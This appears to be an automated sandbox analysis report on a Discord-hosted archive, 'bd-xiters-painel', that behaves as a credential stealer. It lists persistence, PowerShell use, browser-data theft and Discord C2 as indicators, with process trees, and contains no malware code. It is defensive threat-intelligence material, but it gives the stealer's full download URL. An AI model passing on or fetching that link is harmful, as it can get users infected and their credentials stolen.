hxxps://cdn[.]discordapp[.]com/attachments/1250109945622564957/1259092255193432105/bd-xiters-painel[.]rar?ex=668c66ca&is=668b154a&hm=b0e684a2d6663cbbc42c9b8fbb40ef6179eba6fa91b5635d31f104a982ddd373&

Analysis

max time kernel
107s
max time network
108s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
07-07-2024 22:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1250109945622564957/1259092255193432105/bd-xiters-painel.rar?ex=668c66ca&is=668b154a&hm=b0e684a2d6663cbbc42c9b8fbb40ef6179eba6fa91b5635d31f104a982ddd373&

Score

8^/10

execution persistence privilege_escalation pyinstaller spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4720	powershell.exe
2836	powershell.exe
2392	powershell.exe
1364	powershell.exe
3884	powershell.exe
1208	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bd-xiters-painel.exe	bd-xiters-painel.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bd-xiters-painel.exe	bd-xiters-painel.exe

Executes dropped EXE 6 IoCs

pid	Process
4008	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
4452	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
224	bd-xiters-painel.exe
3104	bd-xiters-painel.exe

Loads dropped DLL 64 IoCs

pid	Process
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe
3532	bd-xiters-painel.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000002356e-173.dat	upx
behavioral1/memory/3640-177-0x00007FFB3F7E0000-0x00007FFB3FEA4000-memory.dmp	upx
behavioral1/files/0x0007000000023546-179.dat	upx
behavioral1/files/0x0007000000023568-185.dat	upx
behavioral1/memory/3640-187-0x00007FFB561D0000-0x00007FFB561DF000-memory.dmp	upx
behavioral1/memory/3640-186-0x00007FFB51E30000-0x00007FFB51E55000-memory.dmp	upx
behavioral1/files/0x0007000000023549-190.dat	upx
behavioral1/memory/3640-193-0x00007FFB4A6D0000-0x00007FFB4A6FD000-memory.dmp	upx
behavioral1/memory/3640-192-0x00007FFB51270000-0x00007FFB5128A000-memory.dmp	upx
behavioral1/files/0x0007000000023544-189.dat	upx
behavioral1/files/0x0007000000023545-202.dat	upx
behavioral1/files/0x0007000000023551-212.dat	upx
behavioral1/files/0x000700000002356c-215.dat	upx
behavioral1/files/0x0007000000023571-217.dat	upx
behavioral1/files/0x0007000000023567-220.dat	upx
behavioral1/files/0x0007000000023548-219.dat	upx
behavioral1/files/0x000700000002354c-218.dat	upx
behavioral1/memory/3640-227-0x00007FFB3F2B0000-0x00007FFB3F7D9000-memory.dmp	upx
behavioral1/memory/3640-226-0x00007FFB48D40000-0x00007FFB48D54000-memory.dmp	upx
behavioral1/memory/3640-225-0x00007FFB51F30000-0x00007FFB51F3D000-memory.dmp	upx
behavioral1/memory/3640-224-0x00007FFB52080000-0x00007FFB5208D000-memory.dmp	upx
behavioral1/memory/3640-223-0x00007FFB4FF00000-0x00007FFB4FF19000-memory.dmp	upx
behavioral1/memory/3640-222-0x00007FFB43A80000-0x00007FFB43AB6000-memory.dmp	upx
behavioral1/memory/3640-221-0x00007FFB55C00000-0x00007FFB55C0F000-memory.dmp	upx
behavioral1/files/0x000700000002354d-216.dat	upx
behavioral1/files/0x000700000002354f-210.dat	upx
behavioral1/files/0x000700000002354e-209.dat	upx
behavioral1/files/0x000700000002354b-206.dat	upx
behavioral1/files/0x000700000002354a-205.dat	upx
behavioral1/files/0x0007000000023547-203.dat	upx
behavioral1/files/0x0007000000023572-198.dat	upx
behavioral1/files/0x0007000000023543-201.dat	upx
behavioral1/files/0x0007000000023573-199.dat	upx
behavioral1/files/0x0007000000023569-195.dat	upx
behavioral1/memory/3640-229-0x00007FFB43370000-0x00007FFB433A3000-memory.dmp	upx
behavioral1/memory/3640-231-0x00007FFB3F1E0000-0x00007FFB3F2AD000-memory.dmp	upx
behavioral1/memory/3640-236-0x00007FFB41130000-0x00007FFB41146000-memory.dmp	upx
behavioral1/memory/3640-238-0x00007FFB3EF20000-0x00007FFB3EF32000-memory.dmp	upx
behavioral1/memory/3640-241-0x00007FFB3ED70000-0x00007FFB3EEEF000-memory.dmp	upx
behavioral1/memory/3640-240-0x00007FFB3EEF0000-0x00007FFB3EF14000-memory.dmp	upx
behavioral1/memory/3640-242-0x00007FFB3ED50000-0x00007FFB3ED68000-memory.dmp	upx
behavioral1/memory/3640-243-0x00007FFB3F7E0000-0x00007FFB3FEA4000-memory.dmp	upx
behavioral1/memory/3640-245-0x00007FFB3ED20000-0x00007FFB3ED47000-memory.dmp	upx
behavioral1/memory/3640-246-0x00007FFB3EC00000-0x00007FFB3ED1B000-memory.dmp	upx
behavioral1/memory/3640-244-0x00007FFB49440000-0x00007FFB4944B000-memory.dmp	upx
behavioral1/memory/3640-252-0x00007FFB48D40000-0x00007FFB48D54000-memory.dmp	upx
behavioral1/memory/3640-251-0x00007FFB55C00000-0x00007FFB55C0F000-memory.dmp	upx
behavioral1/memory/3640-253-0x00007FFB3F2B0000-0x00007FFB3F7D9000-memory.dmp	upx
behavioral1/memory/3640-267-0x00007FFB3EB20000-0x00007FFB3EB32000-memory.dmp	upx
behavioral1/memory/3640-266-0x00007FFB43370000-0x00007FFB433A3000-memory.dmp	upx
behavioral1/memory/3640-265-0x00007FFB3EBD0000-0x00007FFB3EBDB000-memory.dmp	upx
behavioral1/memory/3640-264-0x00007FFB3EBE0000-0x00007FFB3EBEC000-memory.dmp	upx
behavioral1/memory/3640-263-0x00007FFB3EB40000-0x00007FFB3EB4D000-memory.dmp	upx
behavioral1/memory/3640-262-0x00007FFB3EB50000-0x00007FFB3EB5C000-memory.dmp	upx
behavioral1/memory/3640-261-0x00007FFB3EB60000-0x00007FFB3EB6C000-memory.dmp	upx
behavioral1/memory/3640-260-0x00007FFB3EB70000-0x00007FFB3EB7B000-memory.dmp	upx
behavioral1/memory/3640-259-0x00007FFB3EB80000-0x00007FFB3EB8B000-memory.dmp	upx
behavioral1/memory/3640-258-0x00007FFB3EB90000-0x00007FFB3EB9C000-memory.dmp	upx
behavioral1/memory/3640-257-0x00007FFB3EBA0000-0x00007FFB3EBAE000-memory.dmp	upx
behavioral1/memory/3640-269-0x00007FFB3EB10000-0x00007FFB3EB1C000-memory.dmp	upx
behavioral1/memory/3640-268-0x00007FFB3F1E0000-0x00007FFB3F2AD000-memory.dmp	upx
behavioral1/memory/3640-256-0x00007FFB3EBB0000-0x00007FFB3EBBC000-memory.dmp	upx
behavioral1/memory/3640-255-0x00007FFB3EBC0000-0x00007FFB3EBCC000-memory.dmp	upx
behavioral1/memory/3640-254-0x00007FFB3EBF0000-0x00007FFB3EBFB000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
36	raw.githubusercontent.com
49	discord.com
50	discord.com
65	discord.com
66	discord.com
35	raw.githubusercontent.com
46	discord.com
62	raw.githubusercontent.com
63	discord.com
45	discord.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	api.ipify.org
30	api.ipify.org
48	api.ipify.org
61	api.ipify.org
64	api.ipify.org

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000a000000023508-81.dat	pyinstaller

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3172	WMIC.exe
4576	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	msedge.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
996	PING.EXE
560	PING.EXE

Suspicious behavior: EnumeratesProcesses 45 IoCs

pid	Process
2808	msedge.exe
2808	msedge.exe
3936	msedge.exe
3936	msedge.exe
2916	identity_helper.exe
2916	identity_helper.exe
1552	msedge.exe
1552	msedge.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
3640	bd-xiters-painel.exe
1984	powershell.exe
1984	powershell.exe
1984	powershell.exe
1540	powershell.exe
1540	powershell.exe
1208	powershell.exe
1208	powershell.exe
2392	powershell.exe
2392	powershell.exe
2836	powershell.exe
2836	powershell.exe
3104	bd-xiters-painel.exe
3104	bd-xiters-painel.exe
3104	bd-xiters-painel.exe
3104	bd-xiters-painel.exe
3104	bd-xiters-painel.exe
3104	bd-xiters-painel.exe
4740	powershell.exe
3104	bd-xiters-painel.exe
3104	bd-xiters-painel.exe
4740	powershell.exe
3880	powershell.exe
3880	powershell.exe
1364	powershell.exe
1364	powershell.exe
3884	powershell.exe
3884	powershell.exe
4720	powershell.exe
4720	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3728	7zG.exe
Token: 35	3728	7zG.exe
Token: SeSecurityPrivilege	3728	7zG.exe
Token: SeSecurityPrivilege	3728	7zG.exe
Token: SeDebugPrivilege	3640	bd-xiters-painel.exe
Token: SeIncreaseQuotaPrivilege	3044	WMIC.exe
Token: SeSecurityPrivilege	3044	WMIC.exe
Token: SeTakeOwnershipPrivilege	3044	WMIC.exe
Token: SeLoadDriverPrivilege	3044	WMIC.exe
Token: SeSystemProfilePrivilege	3044	WMIC.exe
Token: SeSystemtimePrivilege	3044	WMIC.exe
Token: SeProfSingleProcessPrivilege	3044	WMIC.exe
Token: SeIncBasePriorityPrivilege	3044	WMIC.exe
Token: SeCreatePagefilePrivilege	3044	WMIC.exe
Token: SeBackupPrivilege	3044	WMIC.exe
Token: SeRestorePrivilege	3044	WMIC.exe
Token: SeShutdownPrivilege	3044	WMIC.exe
Token: SeDebugPrivilege	3044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3044	WMIC.exe
Token: SeRemoteShutdownPrivilege	3044	WMIC.exe
Token: SeUndockPrivilege	3044	WMIC.exe
Token: SeManageVolumePrivilege	3044	WMIC.exe
Token: 33	3044	WMIC.exe
Token: 34	3044	WMIC.exe
Token: 35	3044	WMIC.exe
Token: 36	3044	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3044	WMIC.exe
Token: SeSecurityPrivilege	3044	WMIC.exe
Token: SeTakeOwnershipPrivilege	3044	WMIC.exe
Token: SeLoadDriverPrivilege	3044	WMIC.exe
Token: SeSystemProfilePrivilege	3044	WMIC.exe
Token: SeSystemtimePrivilege	3044	WMIC.exe
Token: SeProfSingleProcessPrivilege	3044	WMIC.exe
Token: SeIncBasePriorityPrivilege	3044	WMIC.exe
Token: SeCreatePagefilePrivilege	3044	WMIC.exe
Token: SeBackupPrivilege	3044	WMIC.exe
Token: SeRestorePrivilege	3044	WMIC.exe
Token: SeShutdownPrivilege	3044	WMIC.exe
Token: SeDebugPrivilege	3044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3044	WMIC.exe
Token: SeRemoteShutdownPrivilege	3044	WMIC.exe
Token: SeUndockPrivilege	3044	WMIC.exe
Token: SeManageVolumePrivilege	3044	WMIC.exe
Token: 33	3044	WMIC.exe
Token: 34	3044	WMIC.exe
Token: 35	3044	WMIC.exe
Token: 36	3044	WMIC.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeIncreaseQuotaPrivilege	3780	WMIC.exe
Token: SeSecurityPrivilege	3780	WMIC.exe
Token: SeTakeOwnershipPrivilege	3780	WMIC.exe
Token: SeLoadDriverPrivilege	3780	WMIC.exe
Token: SeSystemProfilePrivilege	3780	WMIC.exe
Token: SeSystemtimePrivilege	3780	WMIC.exe
Token: SeProfSingleProcessPrivilege	3780	WMIC.exe
Token: SeIncBasePriorityPrivilege	3780	WMIC.exe
Token: SeCreatePagefilePrivilege	3780	WMIC.exe
Token: SeBackupPrivilege	3780	WMIC.exe
Token: SeRestorePrivilege	3780	WMIC.exe
Token: SeShutdownPrivilege	3780	WMIC.exe

Suspicious use of FindShellTrayWindow 39 IoCs

pid	Process
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3728	7zG.exe
4204	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3936 wrote to memory of 2420	3936	msedge.exe	82
PID 3936 wrote to memory of 2420	3936	msedge.exe	82
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 1956	3936	msedge.exe	83
PID 3936 wrote to memory of 2808	3936	msedge.exe	84
PID 3936 wrote to memory of 2808	3936	msedge.exe	84
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85
PID 3936 wrote to memory of 4768	3936	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1250109945622564957/1259092255193432105/bd-xiters-painel.rar?ex=668c66ca&is=668b154a&hm=b0e684a2d6663cbbc42c9b8fbb40ef6179eba6fa91b5635d31f104a982ddd373&
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb51b546f8,0x7ffb51b54708,0x7ffb51b54718
  2⤵
  PID:2420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
  2⤵
  PID:1956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
  2⤵
  PID:4768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  PID:4304
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2068 /prefetch:1
  2⤵
  PID:1452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
  2⤵
  PID:3436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5628 /prefetch:8
  2⤵
  PID:2644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6000 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
  2⤵
  PID:4416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,14420396711242924397,17690679263701697603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1
  2⤵
  PID:1344

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:212

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:648

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3220

